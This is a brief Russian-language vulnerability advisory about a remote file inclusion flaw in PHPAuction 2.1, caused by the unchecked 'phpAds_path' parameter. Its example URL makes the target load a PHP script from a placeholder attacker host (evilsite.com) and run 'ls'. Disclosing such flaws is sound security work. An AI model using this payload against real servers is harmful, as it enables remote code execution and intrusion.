Программа: PHPAuction 2.1
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "phpAds_path" в
сценарии iew.inc.php.
Пример:
http://target/phpAdsNew/view.inc.php?phpAds_path=http://evilsite.com/dblib.php/cmd=ls
